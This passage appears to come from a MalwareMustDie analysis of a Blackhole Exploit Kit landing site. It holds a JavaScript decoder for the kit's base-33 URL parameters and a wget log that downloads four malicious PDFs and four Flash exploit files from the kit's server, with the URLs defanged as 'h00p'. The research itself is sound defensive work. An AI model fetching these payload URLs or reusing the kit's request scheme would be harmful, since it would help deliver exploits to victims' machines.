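  return value.split(":").map(function (tok) {
    return String.fromCharCode(parseInt(tok, 33));
  }).join("");
}

// Same encoding as the page's x(), kept here to check the round trip.
function encodeB33(s) {
  var out = [];
  for (var i = 0; i < s.length; i++) {
    out.push(s.charCodeAt(i).toString(33));
  }
  return out.join(":");
}

// A value counts as encoded only if every token is one or two base-33
// digits AND decodes to printable ASCII; anything else is kept verbatim,
// so trailing junk values such as "cbfyrfg" or "bda" are not mangled.
var TOKEN_RE = /^[0-9a-w]{1,2}(:[0-9a-w]{1,2})*$/;
function looksEncoded(value) {
  if (!TOKEN_RE.test(value)) return false;
  return value.split(":").every(function (tok) {
    var c = parseInt(tok, 33);
    return c >= 0x20 && c <= 0x7e;
  });
}

// Parse the query string of a landing URL into {name: decodedValue}.
function decodeBhekUrl(url) {
  var q = url.indexOf("?");
  var params = {};
  if (q < 0) return params;
  url.slice(q + 1).split("&").forEach(function (pair) {
    var eq = pair.indexOf("=");
    var name = eq < 0 ? pair : pair.slice(0, eq);
    var value = eq < 0 ? "" : pair.slice(eq + 1);
    params[name] = looksEncoded(value) ? decodeB33(value) : value;
  });
  return params;
}

// Sample input taken from the SWF URL list above.
var sample = "h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
console.log(decodeBhekUrl(sample));
```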
//=============LET's FLUSH THEM (4 PDF + 4 SWF) ALL!!! =============
//pdf
--2013-02-18 15:50:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 20161 (20K) [application/pdf]
Saving to: `./pdf1.pdf'
100%[==============================================================================>] 20,161 32.3K/s in 0.6s
2013-02-18 15:50:24 (32.3 KB/s) - `./pdf1.pdf' saved [20161/20161]
--2013-02-18 15:50:53-- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 11194 (11K) [application/pdf]
Saving to: `./pdf2.pdf'
100%[==============================================================================>] 11,194 32.5K/s in 0.3s
2013-02-18 15:50:54 (32.5 KB/s) - `./pdf2.pdf' saved [11194/11194]
--2013-02-18 15:51:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 20161 (20K) [application/pdf]
Saving to: `./pdf3.pdf'
100%[==============================================================================>] 20,161 31.6K/s in 0.6s
2013-02-18 15:51:24 (31.6 KB/s) - `./pdf3.pdf' saved [20161/20161]
--2013-02-18 15:52:02-- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 11160 (11K) [application/pdf]
Saving to: `./pdf4.pdf'
100%[==============================================================================>] 11,160 34.6K/s in 0.3s
2013-02-18 15:52:03 (34.6 KB/s) - `./pdf4.pdf' saved [11160/11160]
// flash....
--2013-02-18 15:54:34-- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 7981 (7.8K) [text/html]
Saving to: `./flash1.swf'
100%[==============================================================================>] 7,981 26.7K/s in 0.3s
2013-02-18 15:54:36 (26.7 KB/s) - `./flash1.swf' saved [7981/7981]
--2013-02-18 15:54:58-- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 1030 (1.0K) [text/html]
Saving to: `./flash2.swf'
100%[==============================================================================>] 1,030 --.-K/s in 0s
2013-02-18 15:54:59 (35.5 MB/s) - `./flash2.swf' saved [1030/1030]
--2013-02-18 15:55:14-- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 7981 (7.8K) [text/html]
Saving to: `./flash3.swf'
100%[==============================================================================>] 7,981 25.5K/s in 0.3s
2013-02-18 15:55:15 (25.5 KB/s) - `./flash3.swf' saved [7981/7981]
--2013-02-18 15:57:54-- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 1030 (1.0K) [text/html]
Saving to: `./flash4.swf'
100%[==============================================================================>] 1,030 --.-K/s in 0s
2013-02-18 15:57:55 (36.2 MB/s) - `./flash4.swf' saved [1030/1030]
=========================
BHEK has Geo-IP functions built in...
Reference: http://ondailybasis.com/blog/?p=1483
=========================
----
#MalwareMustDie | @unixfreaxjp